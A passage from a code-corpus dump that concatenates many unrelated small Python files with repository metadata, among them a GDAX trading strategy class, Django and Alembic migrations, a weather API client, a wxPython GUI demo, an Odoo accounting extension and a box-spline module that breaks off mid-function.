"""
Base class for trading strategy implementations
Attributes:
trader: An instance of :class:`GDAXTrader`.
accounts: GDAX account data
bid_orders: GDAX order book bid data
ask_orders: GDAX order book ask data
"""
def __init__(self):
self.trader = None
self.accounts = []
self.bid_orders = None
self.ask_orders = None
self.set_up()
def set_up(self):
"""
Override in child class to run code on initialization
"""
pass
def add_trader(self, trader):
self.trader = trader
def next(self):
"""
Must be implemented by child class
Strategy logic goes in this method.
The instance variable dictionaries available to strategies have the
following fields:
accounts:
- id
- currency
- balance
- available
- hold
- profile_id
"""
raise NotImplementedError
def next_data(self, accounts, bid_orders, ask_orders):
"""
Set data to be used for the current strategy iteration
:param accounts: accounts data
:param bid_orders: order book bid data
:param ask_orders: order book ask data
"""
self.accounts = accounts
self.bid_orders = bid_orders
self.ask_orders = ask_orders
def get_currency_balance(self, currency):
"""
Get the current account balance for a currency
:param currency: the currency to get the balance for
:returns: the balance of the account
"""
for account in self.accounts:
try:
if account['currency'] == currency:
return Decimal(account['balance'])
except (KeyError, TypeError, InvalidOperation):
continue
return Decimal(0)
| [
"[email protected]"
] | |
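`Strategy.next()` must be overridden by a concrete strategy, and `next_data` is expected before each `next` call. A minimal hypothetical subclass (not part of the original module) showing the contract:

```python
class HoldStrategy(Strategy):
    """Illustrative do-nothing strategy."""

    def set_up(self):
        self.ticks = 0                      # runs once from Strategy.__init__

    def next(self):
        self.ticks += 1
        usd = self.get_currency_balance("USD")
        logger.info("tick %d: %s USD available", self.ticks, usd)

s = HoldStrategy()
s.next_data(accounts=[{"currency": "USD", "balance": "100.00"}],
            bid_orders=None, ask_orders=None)
s.next()                                    # logs: tick 1: 100.00 USD available
```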
ef9bfca4ec8c994e9d2c9fc630c5971675320583 | 01457e05d0b550eccf2d677e78d04d032326288d | /migrations/versions/f743ab141e32_posts_table.py | d9e63340ab53d1e87ae6f89aab8e7c9e60e75142 | [] | no_license | nessig12/Connect21 | d87e2ca18101777e05cc7c2493bd5a8969115107 | c5dd30fdf8de34625f4d0049534df7e8f586427d | refs/heads/master | 2022-12-10T11:57:35.365588 | 2020-04-24T20:27:59 | 2020-04-24T20:27:59 | 203,684,184 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,057 | py | """posts table
Revision ID: f743ab141e32
Revises: 8f164b7b3fc3
Create Date: 2020-02-05 16:19:35.074665
"""
from alembic import op
import sqlalchemy as sa
# revision identifiers, used by Alembic.
revision = 'f743ab141e32'
down_revision = '8f164b7b3fc3'
branch_labels = None
depends_on = None
def upgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.create_table('post',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('body', sa.String(length=140), nullable=True),
sa.Column('timestamp', sa.DateTime(), nullable=True),
sa.Column('user_id', sa.Integer(), nullable=True),
sa.ForeignKeyConstraint(['user_id'], ['user.id'], ),
sa.PrimaryKeyConstraint('id')
)
op.create_index(op.f('ix_post_timestamp'), 'post', ['timestamp'], unique=False)
# ### end Alembic commands ###
def downgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.drop_index(op.f('ix_post_timestamp'), table_name='post')
op.drop_table('post')
# ### end Alembic commands ###
| [
"[email protected]"
] | |
7c545b2539b091a80362983c3601a5370b3900d0 | 5869de949e274cbaa016bfd52b5b4ab9814de49f | /utils/tester.py | 0598481151fb1aec9ca493e6a4a1aa90491f7908 | [] | no_license | samherring99/ContentBasedMIR | 018a59e8b90f3715ef93fb6c80ec7ee9cf2ed7ad | 787e53f4b1896fb95d66ce110ce4327571b64a4b | refs/heads/master | 2022-06-12T04:45:23.900073 | 2020-05-06T17:04:49 | 2020-05-06T17:04:49 | 261,822,363 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 495 | py | import csv
with open('fma_metadata/tracks.csv') as csv_file:
csv_reader = csv.reader(csv_file, delimiter=',')
line_count = 2
for row in csv_reader:
if line_count == 2:
#print(f'Column names are {", ".join(row)}')
line_count += 1
else:
if str(row[40]) != "":
thing = row[0].zfill(6)
print(f'\t{thing} {row[40]}')
line_count += 1
#print(f'Processed {line_count} lines.')
| [
"[email protected]"
] | |
ab490c6822ee354cc666f436e00aa5657b6a6e99 | dd0cb8b8e7658ae639961cda37397a1e8ea6f4b1 | /test/test_sim_config.py | 6620e507a846a713407dbb63fc1f877b0f9e1c41 | [] | no_license | jamesprinc3/data-analysis | 271b234375b7943770a45718685a4cb708e278b1 | ba3cb56bd05318921e12c4be9600e6ac069d1f14 | refs/heads/master | 2020-03-07T23:32:17.912776 | 2018-06-25T10:33:45 | 2018-06-25T10:33:45 | 127,784,050 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,371 | py | from unittest import TestCase
from sim_config import SimConfig
class TestGenerateConfigString(TestCase):
def setUp(self):
pass
def test_generate_str(self):
config = {'paths': {'testPath': "test/path"}}
config_str = SimConfig.generate_config_string(config)
assert config_str == "paths {\n\ttestPath = \"test/path\"\n}"
def test_generate_int(self):
config = {'execution': {'numSimulations': 10}}
config_str = SimConfig.generate_config_string(config)
assert config_str == "execution {\n\tnumSimulations = 10\n}"
def test_generate_bool(self):
config = {'execution': {'parallel': True}}
config_str = SimConfig.generate_config_string(config)
assert config_str == "execution {\n\tparallel = true\n}"
def test_generate_two_params(self):
config = {'execution': {'numSimulations': 10, 'parallel': True}}
config_str = SimConfig.generate_config_string(config)
assert config_str == "execution {\n\tnumSimulations = 10,\n\tparallel = true\n}"
def test_generate_two_sections(self):
config = {'execution': {'numSimulations': 10}, 'paths': {'testPath': "test/path"}}
config_str = SimConfig.generate_config_string(config)
assert config_str == "execution {\n\tnumSimulations = 10\n}\n\npaths {\n\ttestPath = \"test/path\"\n}" | [
"[email protected]"
] | |
b9aaf73be86b80c86bd56f0ca20545750714ee9d | 66757f36d5e9482058d4283835ab6534e92b48d8 | /Back/glucose/models.py | 23b1ea45b271f6bea89556f8f5aef2bbc29617b0 | [] | no_license | baldiniyuri/ihealth | 4155a008cb7ce9d3b8ccf5313cde171f45e2ebb8 | dedf421593e503bb80f92bb9b5cff95fbedddb75 | refs/heads/master | 2023-06-21T23:54:50.052907 | 2021-07-22T19:22:02 | 2021-07-22T19:22:02 | 388,496,360 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 240 | py | from django.db import models
from authentication.models import User
class Glucose(models.Model):
user = models.ForeignKey(User, on_delete=models.CASCADE)
glucose = models.IntegerField()
date_time = models.DateTimeField()
| [
"[email protected]"
] | |
2ca84c0f31091c70c2f07ff54c5f0e2242ac4d07 | 6818c057f2f6635979400133ef4557f0feae0f9b | /manage.py | e03ca74e91f9550cb5c9ba5be9848a1e5c47ef8e | [] | no_license | MGoss115/parentingapp | 7094cd4bf7a19099e574dec871d86bffe9b15de2 | 518b12ad9f8f36383a9ce83269211ceb9fc080ff | refs/heads/main | 2023-08-16T20:33:23.311835 | 2021-09-21T15:32:50 | 2021-09-21T15:32:50 | 401,867,458 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 672 | py | #!/usr/bin/env python
"""Django's command-line utility for administrative tasks."""
import os
import sys
def main():
"""Run administrative tasks."""
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'parenting_django.settings')
try:
from django.core.management import execute_from_command_line
except ImportError as exc:
raise ImportError(
"Couldn't import Django. Are you sure it's installed and "
"available on your PYTHONPATH environment variable? Did you "
"forget to activate a virtual environment?"
) from exc
execute_from_command_line(sys.argv)
if __name__ == '__main__':
main()
| [
"[email protected]"
] | |
1729d1308dd79975f42c02fcd155b256d5e09da2 | 9f12202bf41fb4a8fc36871aeae3834c55129bf2 | /Interview Questions/Inorder Traversal of BST.py | c67319e4b4b23c2fa2cc95559dc85d8cadde1d8f | [] | no_license | veetarag/Data-Structures-and-Algorithms-in-Python | b8afebbcfc9146ed06efcf09b58c13c52e76b9ab | 167240935d89df2ec6e2777dc561fabe0244c8a9 | refs/heads/master | 2022-11-15T07:38:31.309514 | 2020-07-04T01:54:30 | 2020-07-04T01:54:30 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 428 | py | # Definition for a binary tree node.
class TreeNode(object):
def __init__(self, x):
self.val = x
self.left = None
self.right = None
class Solution(object):
def inorderTraversal(self, root):
rst = []
def util(root):
if root:
util(root.left)
rst.append(root.val)
util(root.right)
util(root)
return rst
| [
"[email protected]"
] | |
9253df4be11c51d42b256b0cb1030a6890b769a5 | e8bd148169647433cedd8219833271e275044145 | /client.py | 5c0466242b044eb65c826fe436035bad6aafdacc | [] | no_license | marco2013/weather-cn | a752cb880f5d1c12ac11471f8214307b1f03411d | ecb7e8b9900342d89323234a575cf872f6c9ca04 | refs/heads/master | 2020-06-30T00:25:46.968308 | 2017-07-17T16:15:44 | 2017-07-17T16:15:44 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,549 | py | #!/usr/bin/env python
#-*- coding:utf-8 -*-
import requests
import sys
import simplejson as jsmod
def main(args):
# http://119.254.100.75:8080/v1/query
ip = "119.254.100.75"
url = "http://%s:8080/v1/query" % (ip)
ret = requests.post(url, data={
# "cn": "重庆",
"cn": "aaa",
})
obj = jsmod.loads(ret.text, encoding='utf-8')
# read as below
# {
# u'weather1d': u'02\u65e520\u65f6,n01,\u591a\u4e91,13\u2103,\u65e0\u6301\u7eed\u98ce\u5411,\u5fae\u98ce,0|02\u65e523\u65f6,n02,\u9634,12\u2103,\u65e0\u6301\u7eed\u98ce\u5411,\u5fae\u98ce,0|03\u65e502\u65f6,n02,\u9634,11\u2103,\u65e0\u6301\u7eed\u98ce\u5411,\u5fae\u98ce,0|03\u65e505\u65f6,n02,\u9634,11\u2103,\u65e0\u6301\u7eed\u98ce\u5411,\u5fae\u98ce,0|03\u65e508\u65f6,d02,\u9634,11\u2103,\u65e0\u6301\u7eed\u98ce\u5411,\u5fae\u98ce,3|03\u65e511\u65f6,d02,\u9634,12\u2103,\u65e0\u6301\u7eed\u98ce\u5411,\u5fae\u98ce,3|03\u65e514\u65f6,d02,\u9634,13\u2103,\u65e0\u6301\u7eed\u98ce\u5411,\u5fae\u98ce,3|03\u65e517\u65f6,d02,\u9634,13\u2103,\u65e0\u6301\u7eed\u98ce\u5411,\u5fae\u98ce,3|03\u65e520\u65f6,n02,\u9634,13\u2103,\u65e0\u6301\u7eed\u98ce\u5411,\u5fae\u98ce,0',
# u'ret_code': 0
# }
if obj["ret_code"] == 0:
weather1d = obj["weather1d"]
# print weather1d
weather_info = weather1d.split("|")
for hourly_weather in weather_info:
            print(hourly_weather)
else:
err = obj["err"]
print "err when get weather: ", err
if __name__ == "__main__":
main(sys.argv[1:])
| [
"[email protected]"
] | |
7d21bd6490d491584a25d9471d4e8fa2af419c32 | 401bf511c4791f9f582ef51e82ceb63c69d31de6 | /src/revolio/serializable/__init__.py | 9f43814bf7635637096ede509eb80792220560a2 | [] | no_license | BenBlaisdell/revolio | ce312332bc13b97ad87d195045d7e8ea74a3da99 | 93d998f1816dee881e71d576574ff9b3bcd9d90c | refs/heads/master | 2022-12-09T08:11:10.936934 | 2018-04-06T14:44:45 | 2018-04-06T14:44:45 | 86,363,426 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 123 | py | from revolio.serializable import fields
from revolio.serializable.serializable import Serializable, KeyFormat, column_type
| [
"[email protected]"
] | |
723404b6f6ded8abfd07d6f264cc4a03cd885cc2 | 025ed7b41e7bb4204916ed0160bc16935999f94f | /library-backend/book/admin.py | f795aeeeec53ddeec8bc7b5898ad52df53ddd2dc | [] | no_license | luhc228/SmartLibrary | deec554778e27b1ede3ad86be52d1f293331be5e | 075814058a721a51b753216908e13995e3d1e819 | refs/heads/master | 2020-04-30T14:18:47.274452 | 2019-03-21T07:07:19 | 2019-03-21T07:07:19 | 176,887,300 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 174 | py | from django.contrib import admin
from .models import Book, NewBook, RecommendBook
admin.site.register(Book)
admin.site.register(NewBook)
admin.site.register(RecommendBook)
| [
"[email protected]"
] | |
8531ff31b3ebfe39de4f571d391d90a7f0ade912 | 9795dda526b3436de26c73353021a0651a6762f9 | /example/wxpython/图形按钮组件封装测试.py | d53fbaf9305e953572ac050f909f31e672a223de | [
"Apache-2.0"
] | permissive | brucekk4/pyefun | 891fc08897e4662823cf9016a680c07b31a8d5be | 1b4d8e13ee2c59574fded792e3f2a77e0b5e11a2 | refs/heads/master | 2023-07-10T03:54:11.437283 | 2021-08-23T17:46:19 | 2021-08-23T17:46:19 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,178 | py | import pyefun.wxefun as wx
class 窗口1(wx.窗口):
def __init__(self):
self.初始化界面()
def 初始化界面(self):
        ######### Component creation code below #########
wx.窗口.__init__(self, None, title='易函数视窗编程系统', size=(600, 369), name='frame', style=wx.窗口边框.普通可调边框& ~(wx.MAXIMIZE_BOX))
self.容器 = wx.容器(self)
self.Centre()
self.窗口1 = self
self.图形按钮1 = wx.图形按钮(self.容器, size=(330, 97), pos=(237, 93), bitmap=None, label='图形按钮')
self.图形按钮1.正常图片 = r'.\resources\hh1.png'
self.图形按钮1.焦点图片 = r'.\resources\hh2.png'
self.图形按钮1.按下图片 = r'.\resources\hh3.png'
self.图形按钮1.禁止图片 = r'.\resources\hh4.png'
self.图形按钮1.显示方式 = r'缩放图片'
self.图形按钮1.图片缩放大小 = (32, 32)
self.图形按钮1.绑定事件(wx.事件.被单击, self.图形按钮1_被单击)
self.按钮1 = wx.按钮(self.容器, size=(161, 44), pos=(35, 197), label='按钮')
self.按钮1.绑定事件(wx.事件.被单击, self.按钮1_被单击)
self.编辑框1 = wx.编辑框(self.容器, size=(149, 43), pos=(26, 21), value='', style=wx.TE_LEFT)
self.超级链接框1 = wx.超级链接框(self.容器, size=(138, 37), pos=(225, 21), label='超级链接框321', url='',style=wx.adv.HL_DEFAULT_STYLE)
self.超级链接框1.链接地址 = r'https://www.baidu.com/'
#########以上是创建的组件代码##########
#########以下是组件绑定的事件代码#########
def 图形按钮1_被单击(self,event):
print("图形按钮1_被单击")
def 按钮1_被单击(self,event):
print("按钮1_被单击")
    ######### End of event handler code #########
class 应用(wx.App):
def OnInit(self):
self.窗口1 = 窗口1()
self.窗口1.Show(True)
return True
if __name__ == '__main__':
app = 应用()
app.MainLoop()
| [
"[email protected]"
] | |
c68569999404cf2d9c7dc35dfaf1c7cd5618998e | 79d55c2d9c6fd7fe5a3b6a1b12c4ff5426e6a505 | /venv/Scripts/easy_install-script.py | 300c999a5cbe9930fd0dc10a79ef4c08bae4c46b | [] | no_license | Mbraun5/Pac-Portal | f63a33070d17f0aecab2227789909dc135ca943c | 4dd48d799f3494a3924605c65ce6f458993b77f6 | refs/heads/master | 2020-04-02T01:38:07.100864 | 2018-11-01T00:47:17 | 2018-11-01T00:47:17 | 153,866,921 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 469 | py | #!"C:\Users\Matthew\Desktop\Pycharm Programs\Pacman Portal\venv\Scripts\python.exe"
# EASY-INSTALL-ENTRY-SCRIPT: 'setuptools==39.1.0','console_scripts','easy_install'
__requires__ = 'setuptools==39.1.0'
import re
import sys
from pkg_resources import load_entry_point
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(
load_entry_point('setuptools==39.1.0', 'console_scripts', 'easy_install')()
)
| [
"[email protected]"
] | |
2366c4dccff48536bca68ac6e560f8df0e8a899f | be77678a23b1d44c7bc0ca87be919d84590b19cd | /wymarzony_pies/migrations/0011_auto_20200915_1235.py | 2946a68153c8ac2eba0266a9f8a9665612309cbb | [] | no_license | Arkadiusz0202/Reservation_system_wymarzony_pies | 42d1d7dbf3ae48836473a05957b36424fbed2358 | 21c09b069a2d78073d26316e7978de3a44dca6c5 | refs/heads/master | 2022-12-17T15:17:01.651347 | 2020-09-15T10:50:45 | 2020-09-15T10:50:45 | 294,917,575 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 565 | py | # Generated by Django 3.1.1 on 2020-09-15 10:35
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('wymarzony_pies', '0010_remove_reservation_customer'),
]
operations = [
migrations.AlterField(
model_name='location',
name='open_form',
field=models.CharField(max_length=128),
),
migrations.AlterField(
model_name='location',
name='open_to',
field=models.CharField(max_length=128),
),
]
| [
"[email protected]"
] | |
1e54fceed8c88b5f717dd20801e59eee679cba41 | 7a738f6c8ae8c4004161a4c3f72120594d48cc07 | /backend/projects/models/category.py | 71e6e390344dc23bb2041e0fb39dc3dfbc07c06b | [
"Apache-2.0"
] | permissive | hndoss/manos-bondadosas | 277bcefd1307cfbcd76bfc70cd0846eb83e9a15e | 2d6eaee63ef3d90f26c7f4862b31f6635eb9dee3 | refs/heads/staging | 2020-12-27T18:54:17.372304 | 2020-07-17T02:41:05 | 2020-07-17T02:41:05 | 238,011,718 | 0 | 0 | Apache-2.0 | 2020-07-17T03:05:55 | 2020-02-03T16:37:04 | JavaScript | UTF-8 | Python | false | false | 367 | py | from django.db import models
class Category(models.Model):
category = models.CharField(blank=False, primary_key=True, max_length=30)
description = models.CharField(blank=False, null=True, max_length=60)
def __str__(self):
return self.category
class Meta:
verbose_name = 'Project Category'
verbose_name_plural = 'Categories' | [
"[email protected]"
] | |
2f43c32851336a99b0f4e75ce5945c65d261ebec | 9bb4f38b400540dee75294a1f48bcb1128f5ecaf | /db/peewee/Students.py | ac9c53de4f43c3b8c509fa7209d063eb55669735 | [] | no_license | andresmontoyab/Python | 43184a01f4e168918ee0499cfc4e989a318de3f5 | 713840ba1bbd64eb8d5549c03c2c7f7e18261017 | refs/heads/main | 2023-05-12T10:28:50.273930 | 2021-05-29T00:20:22 | 2021-05-29T00:20:22 | 333,450,765 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,223 | py | from peewee import *
db = SqliteDatabase('students.db')
# To map objects to database rows, each model class extends peewee's Model.
class Student(Model):
username = CharField(max_length=255, unique=True)
points = IntegerField(default=0)
class Meta:
        # This Meta class tells peewee which database this model belongs to.
database = db
students = [
{
'username': 'Andres',
'points': 7
},
{
'username': 'Juan',
'points': 9
},
{
'username': 'Gelen',
'points': 10
},
{
'username': 'Mari',
'points': 10
}
]
def add_students():
for student in students:
try:
Student.create(username=student['username'],
points=student['points'])
except IntegrityError:
print("Student with username {} was already created".format(student['username']))
def top_student():
top_student = Student.select().order_by(Student.points.desc()).get()
return top_student
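# Illustrative variant (editor's addition): the same query pattern extended to
# the top three students; .limit() is standard peewee query syntax.
def top_three_students():
    return Student.select().order_by(Student.points.desc()).limit(3)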
if __name__ == '__main__':
db.connection()
db.create_tables([Student], safe=True)
add_students()
#top_student()
print(top_student().username) | [
"[email protected]"
] | |
ac7938005be2abd036a827eb5074e581c46cf254 | 13b1ece281a1eaa0cac2706c14f1d4c190f73c2b | /Assignment 3/flood_fill_solutions/BMC201955/BMC201955.py | 149f4a1fda7450ab05aa6732a5ca52691108105c | [] | no_license | bhi5hmaraj/APRG-2020 | 0c995f79cc50108956d1bd0ceed8d7cb6d96f34e | 7e11c14a02d48d52b547696fc930f38c586ce0da | refs/heads/master | 2022-07-17T09:41:58.947321 | 2020-05-21T12:34:46 | 2020-05-21T12:34:46 | 236,176,133 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,177 | py | import sys
lst = list(map(int,input().split(" ")))
lst1 = list(map(int,input().split(" ")))
(m,n) = (lst[0],lst[1])
(p,q) = (lst1[0],lst1[1])
matrix = []
for i in range(n):
matrix.append(list(map(int,input().split(" "))))
lsst = [[0] * m for _ in range(m)]  # fix: [[0]*m]*m aliases every row to the same list
for i in range(n):
a = matrix[i][0]
b = matrix[i][1]
lsst[a-1][b-1] = 2
lsst[p-1][q-1] = 1
def func(lsst1):
m1 = len(lsst1)
for i in range(m1):
for j in range(m1):
if lsst1[i][j] == 1:
if ((i-1) in range(m1)) and (lsst1[(i-1)][j] == 0):
lsst1[(i-1)][j] = 1
elif ((i+1) in range(m1)) and (lsst1[(i+1)][j] == 0):
lsst1[(i+1)][j] = 1
elif ((j-1) in range(m1)) and (lsst1[i][(j-1)] == 0):
lsst1[i][(j-1)] = 1
elif ((j+1) in range(m1)) and (lsst1[i][(j+1)] == 0):
lsst1[i][(j+1)] = 1
return(lsst1)
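# (Editor's note) func performs one relaxation sweep, marking at most one blank
# 4-neighbour per reachable cell; the driver loop below re-runs the sweep once
# for every cell that is still blank when scanned, bounding the passes by m*m.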
for i in range(m):
for j in range(m):
if lsst[i][j] == 0:
lsst = func(lsst)
t = "Y"
for i in range(m):
for j in range(m):
if lsst[i][j] == 0:
t = "N"
break
sys.stdout.write(t)
| [
"[email protected]"
] | |
e6e263c361724887317befacbe85f8dd61830b20 | 30200bf7122c0bb2777db5df451174378493e984 | /tools/run-after-git-clone | 3afe5cf77802ddbeb695af2a5a6afb5c40ddcaae | [
"LicenseRef-scancode-unknown-license-reference",
"Apache-2.0"
] | permissive | rjanser/fastai_pytorch | 7310320d6ef24a47fb9035bf8584b23511eb0261 | ffef0b405292d0a5dc14bf1c0c21d3763f2b4646 | refs/heads/master | 2020-03-30T06:42:22.102529 | 2018-09-29T14:33:08 | 2018-09-29T14:33:08 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,000 | #!/usr/bin/env python
# if you're a fastai developer please make sure you do this:
#
# git clone https://github.com/fastai/fastai_pytorch
# cd fastai_pytorch
# tools/run-after-git-clone
#
import subprocess, os
from pathlib import Path
def run_script(script):
cmd = f"python {script}"
#print(f"Executing: {cmd}")
result = subprocess.run(cmd.split(), shell=False, check=False,
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
if result.returncode != 0: print(f"Failed to execute: {cmd}")
if result.stdout: print(f"{result.stdout.decode('utf-8')}")
if result.stderr: print(f"Error: {result.stderr.decode('utf-8')}")
# make sure we are under the root of the project
cur_dir = Path(".").resolve().name
if (cur_dir == "tools"): os.chdir("..")
path = Path("tools")
# facilitate trusting of the repo-wide .gitconfig
run_script(path/"trust-origin-git-config")
# facilitate trusting notebooks under docs_src
run_script(path/"trust-doc-nbs")
| [
"[email protected]"
] | ||
fdaf8ca8fbc75704adf287f7fed5dfe185c3a435 | 434a2de27730f42a4d632e9c810324e35f893cd4 | /model/base.py | 81b36e5a062720d3ecd01cf234b284f70226352b | [] | no_license | AcademiaSinicaNLPLab/LJ2M | f49ebd55dc777271727a61faecb13c80a5c65c9c | a1dae7e2bb7de03322c5faeabfa8c15d4d476c5b | refs/heads/master | 2020-08-08T20:08:15.493660 | 2015-09-05T02:59:43 | 2015-09-05T02:59:43 | 34,600,097 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 621 | py | import abc
class LearnerBase(metaclass=abc.ABCMeta):
    # NOTE: Python 3 ignores the legacy ``__metaclass__`` attribute, so the
    # metaclass is declared in the class header to make @abc.abstractmethod
    # actually enforce the interface.
#def __init__(self):
# raise NotImplementedError("This is an abstract class.")
@abc.abstractmethod
def set(self, X, y, feature_name):
"""
set the training X, y, and feature name string
"""
pass
@abc.abstractmethod
def train(self, **kwargs):
pass
@abc.abstractmethod
def predict(self, X_test, y_test, **kwargs):
pass
@abc.abstractmethod
def dump_model(self, file_name):
pass
@abc.abstractmethod
def load_model(self, file_name):
pass
| [
"[email protected]"
] | |
0750700020ee9d97d76ac24dad19ec69e89de280 | ebd3ade52cc1122830e2bc07700b83ff0339c7cf | /ufc_live/account_extend/models/models.py | 0748eb41fbf98211927b3f15ef9ee53500769d00 | [] | no_license | Guobower/odoo-project-data | 8596031646d8ba6ed301f7d745f9125bb4d7d99f | 1f6ce801b4113aad18b3ea9a380b5ad257bdbe34 | refs/heads/master | 2020-04-07T07:41:02.796468 | 2017-12-27T17:39:40 | 2017-12-27T17:39:40 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,759 | py | from odoo import models, fields, api
class account_extend(models.Model):
_inherit = 'account.invoice'
bill_no = fields.Char(string="Bill No")
frm_bill_no = fields.Char(string="From Bill No")
province = fields.Char(string="Province")
branch = fields.Many2one('branch',string="Branch")
bill_num = fields.Char(string="To Bill No")
m_tons = fields.Float(string="M Tons")
# summary_id = fields.Many2one('summary.ffc')
    # Punch the branch onto account.move when the invoice is validated (via super).
@api.multi
def action_invoice_open(self):
new_record = super(account_extend, self).action_invoice_open()
JournalEntry = self.env['account.move'].search([('name','=',self.number)])
if self.branch:
JournalEntry.branch = self.branch.id
return new_record
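    # (Editor's note) The pattern above -- let super() validate the invoice,
    # then fetch the freshly posted account.move by its number -- assumes the
    # invoice number uniquely identifies one journal entry.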
class move_extend(models.Model):
_inherit = 'account.move'
branch = fields.Many2one('branch',string="Branch")
ufc_id = fields.Many2one('ufc.auto')
class journal_extend(models.Model):
_inherit = 'account.journal'
branch = fields.Many2one('branch',string="Branch")
class bank_extend(models.Model):
_inherit = 'account.bank.statement'
branch = fields.Many2one('branch',string="Branch")
    # Show the branch of the selected journal in the cash book.
@api.onchange('journal_id')
def get_branch(self):
records = self.env['account.journal'].search([('id','=',self.journal_id.id)])
self.branch = records.branch.id
class bank_extend(models.Model):
_inherit = 'account.bank.statement.line'
branch = fields.Many2one('branch',string="Branch")
    # Punch the branch into the journal entry created by bank reconciliation (via super).
@api.multi
def process_reconciliation(self,data,uid,id):
new_record = super(bank_extend, self).process_reconciliation(data,uid,id)
records = self.env['account.bank.statement'].search([('id','=',self.statement_id.id)])
journal_entery = self.env['account.move'].search([], order='id desc', limit=1)
journal_entery.branch = records.branch.id
return new_record
class ufc_user_extend(models.Model):
_inherit = 'res.users'
Branch = fields.Many2one ('branch',string="Branch")
class branch(models.Model):
_name = 'branch'
Address = fields.Char(string="Address")
name = fields.Char(string="Name")
Phone = fields.Char(string="Phone")
Mobile = fields.Char(string="Mobile")
ptcl = fields.Char("Ptcl")
| [
"[email protected]"
] | |
ca941ddddb7fc347c0a254966760fb0239e0ba73 | 96ea8a4b241794f0eab2e34cbd75124dac26f2ac | /users/migrations/0002_auto_20200628_1146.py | 76855fd7b14a9ccf3149ea2cd030b856d34bdfce | [] | no_license | magloirend/budget_tracker | a1cd53aa9ad2a99e1fd1b8ee445bce2f98136806 | 4a66bc3d516f8116c20aa11399f25e618e74f06e | refs/heads/master | 2022-11-18T04:02:58.427416 | 2020-07-13T13:03:38 | 2020-07-13T13:03:38 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 677 | py | # Generated by Django 3.0.7 on 2020-06-28 11:46
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('users', '0001_initial'),
]
operations = [
migrations.AddField(
model_name='user',
name='organization_owner',
field=models.BooleanField(default=False),
),
migrations.AlterField(
model_name='user',
name='organization',
field=models.ForeignKey(default=1, on_delete=django.db.models.deletion.CASCADE, to='users.Organization'),
preserve_default=False,
),
]
| [
"[email protected]"
] | |
502b63b465725af09cddcbad8d731b28c955743a | c31931fa13cb469b7cc10df3bb87dc308d241fa1 | /game/core/systems/dialogue/__init__.py | 4c39a8a5317135ee08de407920c0e44ea555de4e | [] | no_license | darrickyee/ue-pygame | 53158a98df1dddbd2efdd0132c82eff523b54413 | 9be0a519aa8de455fdb54bddad7e5f773fe86d75 | refs/heads/master | 2021-02-09T01:24:15.015941 | 2020-12-03T03:50:32 | 2020-12-03T03:50:32 | 244,221,961 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 79 | py | from .system import DialogueSystem
from .loader import loadNodes, loadDlgGraph
| [
"[email protected]"
] | |
071e915b9f4f0fb968ac51115b47470507899e6e | 89a3cb6e0625e7ae8d3d4c12bf5214557d344059 | /Report_[2017-05-13]_Box_Spline_Initial_Analysis/box_mesh[6-8-2017 max-side-len verbose].py | 91afd0bec85321cdbf04efb580f2f16d4754acf1 | [] | no_license | tchlux/VarSys | e5adc802bbf8149bd3584d350bb429c24d4cbdd8 | 313a3029d838520d30ce960fa56a897ba9180037 | refs/heads/master | 2023-07-20T10:58:34.901566 | 2020-09-22T15:37:45 | 2020-09-22T15:37:45 | 108,617,499 | 0 | 0 | null | 2023-07-06T21:13:39 | 2017-10-28T03:44:31 | null | UTF-8 | Python | false | false | 23,062 | py | # WARNING: This 'max-side-len' box mesh construction code cannot
# handle data with shared x or y coordinates (allowing for
# more than 2*dimension neighbors)
# WARNING: This 'max-side-len' box mesh construction code does not
# properly expand into higher dimension than x \in
# R^2. During the 'growing' phase, all dimensions need to be
# checked for expansion, not just the current study.
import numpy as np
from plotly_interface import *
import os
# Pre: "x" is a 1 x N dimensional numpy array or list in the range [0,1]
# Post: The value of the quadratic box spline in N dimensions
# is computed for the given point.
def linear(x):
x *= 2
# Compute the box spline function value for the x-coordinate based
# on which region of the box that it is in
func_val = 1.0
for d in range(len(x)):
if (0 <= x[d] < 1):
func_val *= x[d]
elif (1 <= x[d] < 2):
func_val *= (2 - x[d])
return func_val
# Pre: "x" is a 1 x N dimensional numpy array or list in the range [0,1]
# Post: The value of the quadratic box spline in N dimensions
# is computed for the given point.
def quadratic(x):
x *= 3
# Compute the box spline function value for the x-coordinate based
# on which region of the box that it is in
func_val = 1 / 2**(x.shape[0])
for d in range(len(x)):
if (0 <= x[d] < 1):
func_val *= x[d]**2
elif (1 <= x[d] < 2):
func_val *= -(2*x[d]**2 - 6*x[d] + 3)
elif (2 <= x[d] <= 3):
func_val *= (x[d] - 3)**2
return func_val
# Pre: "x" is a 1 x N dimensional numpy array or list in the range [0,1]
# Post: The value of the classic cubic box spline in N dimensions
# is computed for the given point.
def cubic(x):
x *= 4
# Compute the box spline function value for the x-coordinate based
# on which region of the box that it is in
func_val = 1 / (2*3**(x.shape[0]))
for d in range(len(x)):
if (0 <= x[d] < 1):
func_val *= (x[d]**3)
elif (1 <= x[d] < 2):
